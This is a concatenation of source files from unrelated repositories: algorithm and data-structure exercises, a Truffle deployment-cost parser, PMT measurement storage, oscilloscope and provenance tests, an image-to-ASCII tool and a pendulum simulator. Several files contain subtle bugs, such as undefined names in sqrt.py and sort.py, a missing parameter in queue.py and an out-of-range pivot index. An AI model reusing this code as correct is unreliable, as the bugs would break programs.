createFolder(cartella)
plt.savefig(cartella+'/graph.pdf')
'''
```
#### File: deployment_cost/euro/deployment_cost_euro.py
```python
import re
import datetime

INPUT_PATH = '../truffle_test/truffle_test_ris.txt'
OUTPUT_PATH = 'deployment_cost.csv'

def calc_average(list):
    sum = 0
    for i in range(len(list)):
        sum += float(list[i])
    ave = sum/(len(list))
    ave = (round(ave,2))
    return ave

# SCRIPT: collect the deployment prices of the contracts.
with open (INPUT_PATH,'r') as cv:
    lines = cv.readlines()

# flag
deployments = False

# the ugly part
separator = '·····································'
end = '·---------------------------------'

ris = []
for line in lines:
    # only consider the lines with the deployment prices
    if 'Deployments' in line:  # deployment prices
        deployments = True
        continue
    elif end in line:
        deployments = False
    if deployments and separator not in line:
        contract_name = re.compile('\w+').search(line)
        contract_deploy_price = re.compile('(\d+\.\d+)\s[^\%]').search(line)
        ris.append([contract_name.group(),contract_deploy_price.group(1)])

# ok, we have names and prices
# all that is left is to store them in arrays, then compute the average
with open (OUTPUT_PATH,'a') as dep:
    # ISO date
    iso_time_and_date = datetime.datetime.now().isoformat()
    iso_date = iso_time_and_date[:10]

    # contract names
    names = []
    names.append('data')
    for i in range(len(ris)):
        #print (ris[i][0])
        names.append(ris[i][0])
    names.append('average')
    names =','.join(names)  # from list to string

    values = []
    values.append(iso_date)
    # deployment values
    for i in range(len(ris)):
        #print (ris[i][1])
        values.append(ris[i][1])
    ave = calc_average(values[1:])
    values.append(str(ave))
    values = ','.join(values)

    #dep.write(names+'\n')  # only to be written on the first run
    dep.write(values+'\n')
```
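The ratio written to ccrStatistics.csv is simply total comment lines divided by total code lines, times 100. A small self-contained check of the `ccr()` counter above on a throwaway file (the file name is a hypothetical scratch path):

```python
# Quick sanity check of the ccr() counting rules.
sample = """// inline comment
/* one-line block */
int x = 0;
/*
multi
line
*/
int y = 1;
"""
with open("ccr_sample.js", "w") as f:  # hypothetical scratch file
    f.write(sample)

comments, code = ccr("ccr_sample.js")
# the opening /* and closing */ lines themselves are not counted
assert (comments, code) == (4, 2)
print(100.0 * comments / code)  # -> 200.0
```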
{ "source": "8luebottle/DataStructure-N-Algorithm", "score": 3 }
#### File: DataStructure-N-Algorithm/Algorithm/best_time_to_buy_and_sell_stock.py
```python
class Solution:
    def maxProfit(self, prices: List[int]) -> int:
        max_profit, min_price = 0, float('inf')
        for price in prices:
            min_price = min(min_price, price)
            max_profit = max(max_profit, price - min_price)
        return max_profit
```
#### File: DataStructure-N-Algorithm/Algorithm/house_robber.py
```python
def rob(nums):
    last, maximum = 0, 0
    for num in nums:
        last, maximum = maximum, max(last + num, maximum)
    return maximum

"""
Runtime: 24 ms, faster than 92.58% of Python3 online submissions for House Robber.
Memory Usage: 12.7 MB, less than 100.00% of Python3 online submissions for House Robber.
"""
```
#### File: DataStructure-N-Algorithm/Algorithm/integer_to_roman.py
```python
def intToRoman(num):
    arabic = [1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1]
    roman = ['M', 'CM', 'D', 'CD', 'C', 'XC', 'L', 'XL', 'X', 'IX', 'V', 'IV', 'I']

    romanized = ''

    for idx in range(0, len(arabic)):
        while num >= arabic[idx]:
            num -= arabic[idx]
            romanized += roman[idx]

    return romanized
```
#### File: DataStructure-N-Algorithm/Algorithm/linkedlist_LIFO.py
```python
from node import Node

class LinkedListLIFO(object):
    def __init__(self):
        self.head = None
        self.length = 0

    # Starting from the head, print out each node's value
    def _printList(self):
        node = self.head
        while node:
            print(node.value, end=' ')
            node = node.pointer
        print()

    # Given the previous node, delete the node after it
    def _delete(self, prev, node):
        self.length -= 1
        if not prev:
            self.head = node.pointer
        else:
            prev.pointer = node.pointer

    # Add a new node pointing to the old head, then make it the new head
    def _add(self, value):
        self.length += 1
        self.head = Node(value, self.head)

    # Find node by index
    def _find(self, index):
        prev = None
        node = self.head
        i = 0
        while node and i < index:
            prev = node
            node = node.pointer
            i += 1
        return node, prev, i

    # Find node by value
    def _find_by_value(self, value):
        prev = None
        node = self.head
        found = False
        while node and not found:
            if node.value == value:
                found = True
            else:
                prev = node
                node = node.pointer
        return node, prev, found

    # DELETE NODE
    def deleteNode(self, index):
        node, prev, i = self._find(index)
        if index == i:
            self._delete(prev, node)
        else:
            print(f"There's no {index} Node")

    def deleteNodeByValue(self, value):
        node, prev, found = self._find_by_value(value)
        if found:
            self._delete(prev, node)
        else:
            print(f"There's no {value} node")
```
#### File: DataStructure-N-Algorithm/Algorithm/palindrome_number.py
```python
def isPalindrome(x: int) -> bool:
    if x == 0:
        return True
    else:
        # Solve it without converting the integer to a string
        left = x
        right = 0
        while left > 0:
            reminder = left % 10
            right = (right * 10) + reminder
            left = left // 10
        return x == right  # Return Boolean

"""
Runtime: 48 ms, faster than 93.37% of Python3 online submissions for Palindrome Number.
Memory Usage: 12.8 MB, less than 100.00% of Python3 online submissions for Palindrome Number.
"""
```
#### File: DataStructure-N-Algorithm/Algorithm/search_insert_position.py
```python
def searchInsert(nums, target):
    if target in nums:
        return nums.index(target)
    elif target <= nums[0]:
        return 0
    elif target >= nums[-1]:
        return len(nums)
    else:
        for idx, val in enumerate(nums):
            if target < val:
                return idx

"""
Runtime: 40 ms, faster than 98.23% of Python3 online submissions for Search Insert Position.
Memory Usage: 13.5 MB, less than 100.00% of Python3 online submissions for Search Insert Position.
""" ``` #### File: DataStructure-N-Algorithm/Algorithm/sqrt.py ```python def mySqrt(x): if x < 2: return x left, right = 1, x // 2 while left <= right: mid = left + (rigt-left) // 2 if mid > x / mid: right = mid -1 else: left = mid + 1 return left - 1 """ Runtime: 24 ms, faster than 96.59% of Python3 online submissions for Sqrt(x). Memory Usage: 12.6 MB, less than 100.00% of Python3 online submissions for Sqrt(x). """ ``` #### File: DataStructure-N-Algorithm/Data_Structure/queue.py ```python import heapq class Queue(object): def __init__(self): self.in_stack = [] self.out_stack = [] def _transfer(self): while self.in_stack: self.out_stack.append(self.in_stack.pop()) def enqueue(self): return self.in_stack.append(item) def dequeue(self): if not self.out_stack: self._transfer() if self.out_stack: return self.out_stack.pop() else: print("QUEUE is Empty!") def size(self): return len(self.in_stack) + len(self.out_stack) def peek(self): if not self.out_stack: self._transfer() if self.out_stack: return self.out_stack[-1] else: print("QUEUE is Empty!") def __repr__(self): if not self.out_stack: self._transfer() if self.out_stack: return repr(self.out_stack) else: print("QUEUE is Empty!") def isEmpty(self): return not (bool(self.in_stack) or bool(self.out_stack)) class PriorityQueue(object): def __init__(self): self._queue = [] self._index = 0 def push(self, item, priority): heapq.heappush(self._queue, (-priority, self._index, item)) self._index += 1 def pop(self): return heapq.heappop(self.queue)[-1] class Item: def __init__(self, name): self.name = name def __repr__(self): return "Item({0!r})".format(self.name) def test_priority_queue(): # Push와 pop --> (logN) q = PriorityQueue() q.push(Item('test1'), 1) q.push(Item('test2'), 4) q.push(Item('test3'), 3) assert(str(q.pop()) == "Item('test2')") print('Passed the Test') if __name__ == "__main__": test_priority_queue() ``` #### File: DataStructure-N-Algorithm/Data_Structure/sort.py ```python def selection_sort(seq): length = len(seq) for i in range(length-1): min_j = i for j in range(i+1, length): if seq[min_j] > seq[j]: min_j = j seq[i], seq[min_j] = seq[min_j], seq[i] return seq # Insertion Sort def insertion_sort(seq): for i in range(1, len(seq)): j = i while j > 0 and seq[j-1] > seq[j]: seq[j-1], seq[j] = seq[j], seq[j-1] j -= 1 return seq def insertion_sort_rec(seq, i=None): if i is None: i = len(seq) - 1 if i == 0: return i insertion_sort_req(seq, i-1) j = i while j > 0 and seq[j-i] > seq[j]: seq[j-1], seq[j] = seq[j], seq[j-1] j -= 1 return seq # Bubble Sort def bubble_sort(seq): length = len(seq)-1 for num in range(length, 0, -1): # Sort by Descending Order for i in range(num): if seq[i] > seq[i+1]: seq[i], seq[i+1] = seq[i+1], seq[i] # Exchange it return seq # Gnome Sort def gnome_sort(seq): i = 0 while i < len(seq): if i == 0 or seq[i-1] <= seq[i]: i += 1 else: seq[i], seq[i-1] = seq[i-1], seq[i] i -= 1 return seq #Count Sort def count_sort_dict(a): b, c = [], defaultdict(list) for x in a: c[x].append(x) for k in range(min(c), max(c) + 1): b.extend(c[k]) return b # Quick Sort def quick_sort_cache(seq): if len(seq) < 2: return seq ipivot = len(seq) pivot = seq[ipivot] before = [x for i, x in enumerate(seq) if x <= pivot and i != ipivot] after = [x for i, x in enumerate(seq) if x > pivot and i != ipivot] return quick_sort_cache(before) + [pivot] + quick_sort_cache(after) # Heap Sort : Without Using Module def heap_sort(seq): for start in range((len(seq)-2)//2, -1, -1): siftdown(seq, start, len(seq)-1) for end in range(len(seq)-1, 0, -1): 
        seq[end], seq[0] = seq[0], seq[end]
        siftdown(seq, 0, end-1)
    return seq

def siftdown(seq, start, end):
    root = start
    while True:
        child = root * 2 + 1
        if child > end:
            break
        if child + 1 <= end and seq[child] < seq[child + 1]:
            child += 1
        if seq[root] < seq[child]:
            seq[root], seq[child] = seq[child], seq[root]
            root = child
        else:
            break
```
#### File: DataStructure-N-Algorithm/Data_Structure/stack.py
```python
class Stack(object):
    def __init__(self):
        self.items = []

    def isEmpty(self):
        return not bool(self.items)

    def push(self, value):
        self.items.append(value)

    def pop(self):
        if self.items:
            return self.items.pop()
        else:
            print('Stack is Empty.')

    def size(self):
        return len(self.items)

    def peek(self):
        if self.items:
            return self.items[-1]
        else:
            print('Stack is Empty.')

    def __repr__(self):
        return repr(self.items)

if __name__ == "__main__":
    stack = Stack()
    print('Is Stack Empty? {0}'.format(stack.isEmpty()))
    print('Add 0-9 number to the stack.')
    for i in range(10):
        stack.push(i)
    print('Stack Size: {0}'.format(stack.size()))
    print('peek: {0}'.format(stack.peek()))
    print('pop: {0}'.format(stack.pop()))
    print('peek: {0}'.format(stack.peek()))
    print('Is Stack Empty? {0}'.format(stack.isEmpty()))
    print(stack)
```
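A quick smoke test exercising the sorting routines from sort.py above against Python's built-in `sorted()`; the function names are exactly the ones defined there.

```python
# Smoke test for the sort implementations above.
import random

data = [random.randint(0, 99) for _ in range(20)]
expected = sorted(data)

for sort_fn in (selection_sort, insertion_sort, insertion_sort_rec,
                bubble_sort, gnome_sort, count_sort_dict,
                quick_sort_cache, heap_sort):
    # pass a fresh copy, since most of these sort in place
    assert sort_fn(list(data)) == expected, sort_fn.__name__
print("all sorts agree with sorted()")
```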
{ "source": "8me/DuCroy", "score": 2 }
#### File: DuCroy/ducroy/pmt_data.py ```python import h5py import numpy as np class PmtData: def __init__(self, serial, nominal_voltage=1000, nominal_gain=3e6): if serial == "": return self.filepath = "./{}.h5".format(serial) with h5py.File(self.filepath, "w") as file: file.attrs[u'serial'] = serial file.attrs[u'nominal_voltage'] = nominal_voltage file.attrs[u'nominal_gain'] = nominal_gain grp_analysis = file.create_group("analysis") grp_analysis.attrs[u'measured_nominal_gain'] = -1 grp_analysis.attrs[u'measured_nominal_gain_err'] = -1 grp_analysis.attrs[u'measured_nominal_voltage'] = -1 grp_analysis.attrs[u'measured_nominal_voltage_err'] = -1 @property def serial(self): retval = '' with h5py.File(self.filepath, "r") as file: retval = str(file.attrs[u'serial']) return retval @serial.setter def serial(self, value): with h5py.File(self.filepath, "r+") as file: file.attrs[u'serial'] = value @property def nominal_voltage(self): retval = '' with h5py.File(self.filepath, "r") as file: retval = file.attrs[u'nominal_voltage'] return retval @nominal_voltage.setter def nominal_voltage(self, value): with h5py.File(self.filepath, "r+") as file: file.attrs[u'nominal_voltage'] = value @property def nominal_gain(self): retval = '' with h5py.File(self.filepath, "r") as file: retval = file.attrs[u'nominal_gain'] return retval @nominal_gain.setter def nominal_gain(self, value): with h5py.File(self.filepath, "r+") as file: file.attrs[u'nominal_gain'] = value def _get_analysis_attr(self, key): retval = None with h5py.File(self.filepath, "r") as file: group = file[u'analysis'] retval = group.attrs[key] return retval def _set_analysis_attr(self, key, value): with h5py.File(self.filepath, "r+") as file: group = file[u'analysis'] group.attrs[key] = value @property def measured_nominal_voltage(self): return self._get_analysis_attr(u'measured_nominal_voltage') @measured_nominal_voltage.setter def measured_nominal_voltage(self, value): self._set_analysis_attr(u'measured_nominal_voltage', value) @property def measured_nominal_voltage_error(self): return self._get_analysis_attr(u'measured_nominal_voltage_err') @measured_nominal_voltage_error.setter def measured_nominal_voltage_error(self, value): self._set_analysis_attr(u'measured_nominal_voltage_err', value) @property def measured_nominal_gain(self): return self._get_analysis_attr(u'measured_nominal_gain') @measured_nominal_gain.setter def measured_nominal_gain(self, value): self._set_analysis_attr(u'measured_nominal_gain', value) @property def measured_nominal_gain_error(self): return self._get_analysis_attr(u'measured_nominal_gain_err') @measured_nominal_gain_error.setter def measured_nominal_gain_error(self, value): self._set_analysis_attr(u'measured_nominal_gain_err', value) def add_fit_results(self, hv, used_gaussians, nphe, q0, q0sigma, q1, q1sigma, gain, gain_err): dataset_groupname = "/analysis/{:.0f}V".format(hv) with h5py.File(self.filepath, "r+") as file: dataset_group = None if dataset_groupname not in file.keys(): dataset_group = file.create_group(dataset_groupname) else: dataset_group = file[dataset_groupname] dataset_group.attrs[u'nphe'] = nphe dataset_group.attrs[u'used_gaussians'] = used_gaussians dataset_group.attrs[u'q0'] = q0 dataset_group.attrs[u'q0sigma'] = q0sigma dataset_group.attrs[u'q1'] = q1 dataset_group.attrs[u'q1sigma'] = q1sigma dataset_group.attrs[u'gain'] = gain dataset_group.attrs[u'gain_err'] = gain_err def get_fit_results(self, hv): retval = dict() dataset_groupname = "/analysis/{:.0f}V".format(hv) with h5py.File(self.filepath, 
"r") as file: dataset_group = file[dataset_groupname] retval[u'nphe'] = file[dataset_groupname].attrs[u'nphe'] retval[u'used_gaussians'] = file[dataset_groupname].attrs[u'used_gaussians'] retval[u'q0'] = file[dataset_groupname].attrs[u'q0'] retval[u'q0sigma'] = file[dataset_groupname].attrs[u'q0sigma'] retval[u'q1'] = file[dataset_groupname].attrs[u'q1'] retval[u'q1sigma'] = file[dataset_groupname].attrs[u'q1sigma'] retval[u'gain'] = file[dataset_groupname].attrs[u'gain'] retval[u'gain_err'] = file[dataset_groupname].attrs[u'gain_err'] return retval def add_waveforms(self, hv, name, horizontal_interval, vertical_gain, samples, comment=''): dataset_groupname = "/raw_data/{0:.0f}V/{1}".format(hv, name) with h5py.File(self.filepath, "r+") as file: if dataset_groupname not in file.keys(): dataset_group = file.create_group(dataset_groupname) else: dataset_group = file[dataset_groupname] dataset_group.attrs[u'comment'] = comment dataset_group.attrs[u'horizontal_interval'] = horizontal_interval dataset_group.attrs[u'vertical_gain'] = vertical_gain dataset_group[u'data'] = samples def add_histogram(self, hv, x, y): dataset_groupname = "/analysis/{:.0f}V".format(hv) with h5py.File(self.filepath, "r+") as file: dataset_group = None if dataset_groupname not in file.keys(): dataset_group = file.create_group(dataset_groupname) else: dataset_group = file[dataset_groupname] dataset_group[u'histogram'] = (x, y) def get_histogram(self, hv): retval = None dataset_groupname = "/analysis/{:.0f}V/histogram".format(hv) with h5py.File(self.filepath, "r") as file: retval = np.asarray(file[dataset_groupname]) return retval def get_gains_and_voltages(self): hv = [] gain = [] with h5py.File(self.filepath, "r") as file: analysis = file[u'analysis'] for key in list(analysis.keys()): voltage = int(key.rstrip('V')) hv.append(voltage) gain.append(self.get_fit_results(voltage)['gain']) return (hv,gain) @staticmethod def read_from_file(filepath): retval = PmtData(serial = '') retval.filepath = filepath return retval ``` #### File: ducroy/tests/test_osci_control.py ```python import tempfile import unittest from unittest.mock import patch, MagicMock import numpy as np from ducroy.osci_control import Osci, OPEN_CMD class TestOsci(unittest.TestCase): @patch('visa.ResourceManager') def test_init(self, rm_mock): osci = Osci('1') # noqa rm_mock.assert_called_with("@py") @patch('visa.ResourceManager') def test_open_resource(self, rm_mock): ip = '1' osci = Osci(ip) osci.rm = MagicMock() osci._open_resource() osci.rm.open_resource.assert_called_with(OPEN_CMD.format(ip)) @patch('visa.ResourceManager') def test_write(self, rm_mock): ip = '1' osci = Osci(ip) osci.visa_if = MagicMock() osci.write("VDIV","C1","1","V") osci.visa_if.write.assert_called_with("C1:VDIV 1V") @patch('visa.ResourceManager') def test_read(self, rm_mock): ip = '1' osci = Osci(ip) osci.visa_if = MagicMock() osci.read("VDIV","C1") osci.visa_if.query.assert_called_with("C1:VDIV?") def test_variable_conversion(self): ip = '1' osci = Osci(ip) self.assertEqual(osci.decimal_to_visa_string(1e3),"1.00E+03") def test_write_read_waveforms(self): waveforms = np.random.random((10, 10)) comment, h_int, v_gain = 'a', 1, 2 with tempfile.NamedTemporaryFile(delete=True) as fobj: fp = fobj.name Osci.save_waveforms_to_file(fp, waveforms, h_int, v_gain, comment) file_data = Osci.read_waveforms_from_file(fp) assert np.allclose(waveforms, file_data['data']) assert file_data['horizontal_interval'] == h_int assert file_data['vertical_gain'] == v_gain assert file_data['comment'] == comment 
```
{ "source": "8me/thepipe", "score": 2 }
#### File: thepipe/tests/test_provenance.py ```python import tempfile import unittest from thepipe import Provenance class TestProvenance(unittest.TestCase): def setUp(self): p = Provenance() p.reset() def test_activity(self): p = Provenance() activity_uuid = p.start_activity("test") assert p.current_activity.name == "test" p.finish_activity(activity_uuid) assert "test" in [b.name for b in p.backlog] assert len(p._activities) == 0 assert p.backlog[0].provenance["duration"] > 0 def test_finish_activity_with_wrong_uuid_raises(self): p = Provenance() p.start_activity("test") with self.assertRaises(ValueError): p.finish_activity("narf") def test_record_input_output(self): p = Provenance() p.start_activity("test") p.record_input("in.file") p.record_output("out.file") assert "in.file" == p.current_activity.provenance["input"][0]["url"] assert "out.file" == p.current_activity.provenance["output"][0]["url"] def test_record_input_sets_uuid_to_none_by_default(self): p = Provenance() p.start_activity("test") p.record_input("in.file") assert p.current_activity.provenance["input"][0]["uuid"] is None def test_record_output_sets_uuid_by_default(self): p = Provenance() p.start_activity("test") p.record_output("out.file") assert p.current_activity.provenance["output"][0]["uuid"] is not None def test_record_input_sets_uuid(self): p = Provenance() p.start_activity("test") p.record_input("out.file", uuid="abc") assert "abc" == p.current_activity.provenance["input"][0]["uuid"] def test_record_output_sets_uuid(self): p = Provenance() p.start_activity("test") p.record_output("out.file", uuid="abc") assert "abc" == p.current_activity.provenance["output"][0]["uuid"] def test_record_configuration(self): p = Provenance() p.start_activity("test") p.record_configuration({"a": 1}) assert p.current_activity.provenance["configuration"]["a"] == 1 def test_record_configuration_updates_instead_of_overwrites(self): p = Provenance() p.record_configuration({"a": 1}) assert p.current_activity.provenance["configuration"]["a"] == 1 p.record_configuration({"a": 2}) assert p.current_activity.provenance["configuration"]["a"] == 2 def test_record_configuration_updates_and_keeps_old_config_intact(self): p = Provenance() p.record_configuration({"a": 1}) assert p.current_activity.provenance["configuration"]["a"] == 1 p.record_configuration({"b": 2}) assert p.current_activity.provenance["configuration"]["b"] == 2 assert p.current_activity.provenance["configuration"]["a"] == 1 def test_parent_child_activities(self): p = Provenance() parent_uuid = p.current_activity.uuid first = p.start_activity("first") assert parent_uuid == p.current_activity._data["parent_activity"] p.finish_activity(first) second = p.start_activity("second") assert parent_uuid == p.current_activity._data["parent_activity"] p.finish_activity(second) assert first in p.current_activity._data["child_activities"] assert second in p.current_activity._data["child_activities"] def test_as_json(self): p = Provenance() p.start_activity("test") p.as_json() def test_as_json_with_non_serialisable_objects_doesnt_fail(self): p = Provenance() class Foo: pass uuid = p.start_activity("test") p.record_configuration({"a": Foo()}) p.finish_activity(uuid) p.as_json() def test_context_manager(self): p = Provenance() with p.activity("test"): p.record_input("whatever.file") assert "test" in [b.name for b in p.backlog] def test_outfile(self): p = Provenance() p.reset() fobj = tempfile.NamedTemporaryFile(delete=True) p.outfile = fobj.name p._export() assert open(fobj.name, "r").read() == 
p.as_json(indent=2) ```
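The tests above double as documentation for the Provenance API; in plain usage the same calls look like this (the activity name and file names are hypothetical).

```python
# Typical usage pattern mirrored from the tests above.
from thepipe import Provenance

p = Provenance()
with p.activity("calibration"):           # context manager, as in test_context_manager
    p.record_input("raw_run_0042.h5")     # hypothetical input file
    p.record_configuration({"gain": 1.2})
    p.record_output("calibrated_0042.h5")

print(p.as_json(indent=2))                # serialise the collected provenance
```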
{ "source": "8nhuman8/image2ascii", "score": 3 }
#### File: 8nhuman8/image2ascii/main.py
```python
from json import load

from PIL import Image
from numpy import array, average
from argparse import ArgumentParser, Namespace


def get_average_luminance(image: Image.Image) -> float:
    image_array = array(image)
    width, height = image_array.shape
    return average(image_array.reshape(width * height))


def convert_image_to_ascii(image_path: str, cols: int, scale: float, more_levels: bool) -> list:
    with open('config.json', 'r') as json_file:
        data = load(json_file)
        gray_scale_level_10 = data['gray_scale_level_10']
        gray_scale_level_70 = data['gray_scale_level_70']

    image = Image.open(image_path).convert('L')
    image_width, image_height = image.size[0], image.size[1]
    print(f'Input image dims: {image_width}x{image_height}')

    tile_width = image_width / cols
    tile_height = tile_width / scale

    rows = int(image_height / tile_height)

    print(f'Cols: {cols}, rows: {rows}')
    print(f'Tile dims: {tile_width}x{tile_height}')

    if cols > image_width or rows > image_height:
        raise IndexError('Image too small for specified rows or cols')

    ascii_image = []
    for j in range(rows):
        y1 = int(j * tile_height)
        y2 = int((j + 1) * tile_height)

        if j == rows - 1:
            y2 = image_height

        ascii_image.append('')

        for i in range(cols):
            x1 = int(i * tile_width)
            x2 = int((i + 1) * tile_width)

            if i == cols - 1:
                x2 = image_width

            image_tile = image.crop((x1, y1, x2, y2))
            average_luminance = int(get_average_luminance(image_tile))

            if more_levels:
                gray_scale_value = gray_scale_level_70[int((average_luminance * 69) / 255)]
            else:
                gray_scale_value = gray_scale_level_10[int((average_luminance * 9) / 255)]

            ascii_image[j] += gray_scale_value

    return ascii_image


def parse_args() -> Namespace:
    parser = ArgumentParser(description='This program converts an image into ASCII art.')
    parser.add_argument('-i', '--in', metavar='PATH', dest='image_path', type=str,
                        required=True, help='Image path.')
    parser.add_argument('-s', '--scale', metavar='FLOAT', type=float,
                        default=0.6, help='Scale value.')
    parser.add_argument('-o', '--out', metavar='PATH', dest='out_txt_path', type=str,
                        default='out.txt', help='The path of the output file.')
    parser.add_argument('-c', '--cols', metavar='INT', type=int,
                        default=50, help='The number of columns.')
    parser.add_argument('-ml', '--more-levels', action='store_true',
                        help='More grayscale levels will be used.')
    return parser.parse_args()


def create_ascii_image(args: Namespace) -> None:
    ascii_image = convert_image_to_ascii(args.image_path, args.cols,
                                         args.scale, args.more_levels)

    with open(args.out_txt_path, 'w') as out_txt:
        for row in ascii_image:
            out_txt.write(row + '\n')

    print(f'ASCII art written to {args.out_txt_path}')


if __name__ == '__main__':
    args = parse_args()
    create_ascii_image(args)
```
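`convert_image_to_ascii()` can also be called directly, bypassing argparse; a short sketch with a hypothetical input image (config.json with the two grayscale ramps must exist next to the script, as the code above expects).

```python
# Direct-call sketch; 'input.jpg' is a placeholder path.
rows = convert_image_to_ascii('input.jpg', cols=80, scale=0.6, more_levels=True)
print('\n'.join(rows))
```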
{ "source": "8nhuman8/pendulumious", "score": 3 }
#### File: pendulumious/src/main.py ```python from math import cos, sin from os import environ from platform import system from random import randrange from tkinter import Button, E, Frame, RAISED, SUNKEN, Tk, W from pygame import QUIT, init, quit as pygame_quit from pygame.display import flip, set_mode from pygame.draw import aaline, aalines, circle, line from pygame.event import get as get_events from pygame.time import Clock from utils import first_acceleration, second_acceleration from widgets_frame import WidgetsFrame WIDTH, HEIGTH = 500, 500 ORIGIN = (WIDTH // 2, HEIGTH // 3) add_offset = lambda x, y: (x + ORIGIN[0], ORIGIN[1] - y) pause = False first_frame_will_be_shown = True reset = False root = Tk() root.title('Pendulumious') root.resizable(False, False) embed = Frame(root, width=WIDTH, height=HEIGTH) embed.grid(row=0, column=0) widgets = WidgetsFrame(root, width=WIDTH, height=HEIGTH) widgets.grid(row=0, column=1) widgets.grid_propagate(False) def pause_button_behavior(): global pause if pause: pause_button.config(relief=RAISED) else: pause_button.config(relief=SUNKEN) pause = not pause def reset_button_behavior(): global reset reset = True pause_button = Button(widgets, text='Pause', command=pause_button_behavior) pause_button.config(relief=SUNKEN) pause_button.grid( row=10, column=0, columnspan=2, sticky=W + E, padx=(10,), pady=(10,) ) reset_button = Button(widgets, text='Reset', command=reset_button_behavior) reset_button.grid( row=10, column=2, columnspan=2, sticky=W + E, padx=(10,), pady=(10,) ) environ['SDL_WINDOWID'] = str(embed.winfo_id()) if system() == 'Windows': environ['SDL_VIDEODRIVER'] = 'windib' init() screen = set_mode((WIDTH, HEIGTH)) clock = Clock() gravity = None mass1, mass2 = None, None length1, length2 = None, None angle1, angle2 = randrange(0, 10), randrange(0, 10) anglular_velocity1, angular_velocity2 = 0, 0 trail1, trail2 = [], [] running = True def stop_running(): global running running = False root.protocol('WM_DELETE_WINDOW', stop_running) while running: if reset: angle1, angle2 = randrange(0, 10), randrange(0, 10) anglular_velocity1, angular_velocity2 = 0, 0 trail1, trail2 = [], [] pause_button.config(relief=SUNKEN) first_frame_will_be_shown = True reset = False if not pause: for event in get_events(): if event.type == QUIT: running = False gravity = widgets.gravity.get() fps = widgets.fps.get() mass1 = widgets.mass1.get() mass2 = widgets.mass2.get() length1 = widgets.length1.get() length2 = widgets.length2.get() bg_color = ( widgets.bg_color_r.get(), widgets.bg_color_g.get(), widgets.bg_color_b.get() ) dots_color = ( widgets.dots_color_r.get(), widgets.dots_color_g.get(), widgets.dots_color_b.get() ) trail1_color = ( widgets.trail1_color_r.get(), widgets.trail1_color_g.get(), widgets.trail1_color_b.get() ) trail2_color = ( widgets.trail2_color_r.get(), widgets.trail2_color_g.get(), widgets.trail2_color_b.get() ) joints_color = ( widgets.joints_color_r.get(), widgets.joints_color_g.get(), widgets.joints_color_b.get() ) use_fade1 = widgets.use_fade1.get() make_fade_bold1 = widgets.make_fade_bold1.get() use_fade2 = widgets.use_fade2.get() make_fade_bold2 = widgets.make_fade_bold2.get() fade_length1 = widgets.fade_length1.get() fade_length2 = widgets.fade_length2.get() angular_acceleration1 = first_acceleration( gravity, mass1, mass2, length1, length2, angle1, angle2, anglular_velocity1, angular_velocity2 ) angular_acceleration2 = second_acceleration( gravity, mass1, mass2, length1, length2, angle1, angle2, anglular_velocity1, angular_velocity2 ) x1 = 
int(length1 * sin(angle1)) y1 = int(-length1 * cos(angle1)) x2 = int(x1 + length2 * sin(angle2)) y2 = int(y1 - length2 * cos(angle2)) trail1.append(add_offset(x1, y1)) trail2.append(add_offset(x2, y2)) screen.fill(bg_color) aalines( screen, joints_color, False, [ ORIGIN, add_offset(x1, y1), add_offset(x2, y2) ] ) if len(trail1) > 1 and not use_fade1: aalines(screen, trail1_color, False, trail1) if len(trail2) > 1 and not use_fade2: aalines(screen, trail2_color, False, trail2) if use_fade1: while len(trail1) > fade_length1: trail1.pop(0) for i in range(len(trail1) - 1): r = widgets.trail1_color_r.get() + (len(trail1) - i) * 25 g = widgets.trail1_color_g.get() + (len(trail1) - i) * 25 b = widgets.trail1_color_b.get() + (len(trail1) - i) * 25 if r > 255: r = 255 if g > 255: g = 255 if b > 255: b = 255 start_position = (int(trail1[i][0]), int(trail1[i][1])) end_position = (int(trail1[i + 1][0]), int(trail1[i + 1][1])) if make_fade_bold1: line(screen, (r, g, b), start_position, end_position, mass1) else: aaline(screen, (r, g, b), start_position, end_position) if use_fade2: while len(trail2) > fade_length2: trail2.pop(0) for i in range(len(trail2) - 1): r = widgets.trail2_color_r.get() + (len(trail2) - i) * 25 g = widgets.trail2_color_g.get() + (len(trail2) - i) * 25 b = widgets.trail2_color_b.get() + (len(trail2) - i) * 25 if r > 255: r = 255 if g > 255: g = 255 if b > 255: b = 255 start_position = (int(trail2[i][0]), int(trail2[i][1])) end_position = (int(trail2[i + 1][0]), int(trail2[i + 1][1])) if make_fade_bold2: line(screen, (r, g, b), start_position, end_position, mass2) else: aaline(screen, (r, g, b), start_position, end_position) circle(screen, dots_color, ORIGIN, 5) circle(screen, dots_color, add_offset(x1, y1), mass1) circle(screen, dots_color, add_offset(x2, y2), mass2) flip() clock.tick(fps) anglular_velocity1 += angular_acceleration1 angular_velocity2 += angular_acceleration2 angle1 += anglular_velocity1 angle2 += angular_velocity2 if first_frame_will_be_shown: pause = True first_frame_will_be_shown = False root.update_idletasks() root.update() pygame_quit() quit() ```
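The `utils` module providing `first_acceleration` and `second_acceleration` is not shown in this repository snippet; a plausible implementation is the standard double-pendulum angular accelerations. This is an assumption about the missing file, though the argument order below deliberately matches the calls in main.py above.

```python
# Hedged reconstruction of the missing utils.py: the textbook double-pendulum
# accelerations. Argument order matches first_acceleration(gravity, mass1,
# mass2, length1, length2, angle1, angle2, w1, w2) as called in main.py.
from math import sin, cos

def first_acceleration(g, m1, m2, l1, l2, a1, a2, w1, w2):
    num = (-g * (2 * m1 + m2) * sin(a1)
           - m2 * g * sin(a1 - 2 * a2)
           - 2 * sin(a1 - a2) * m2 * (w2 ** 2 * l2 + w1 ** 2 * l1 * cos(a1 - a2)))
    den = l1 * (2 * m1 + m2 - m2 * cos(2 * a1 - 2 * a2))
    return num / den

def second_acceleration(g, m1, m2, l1, l2, a1, a2, w1, w2):
    num = (2 * sin(a1 - a2)
           * (w1 ** 2 * l1 * (m1 + m2)
              + g * (m1 + m2) * cos(a1)
              + w2 ** 2 * l2 * m2 * cos(a1 - a2)))
    den = l2 * (2 * m1 + m2 - m2 * cos(2 * a1 - 2 * a2))
    return num / den
```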
{ "source": "8nhuman8/pyanitsa-simulation", "score": 4 }
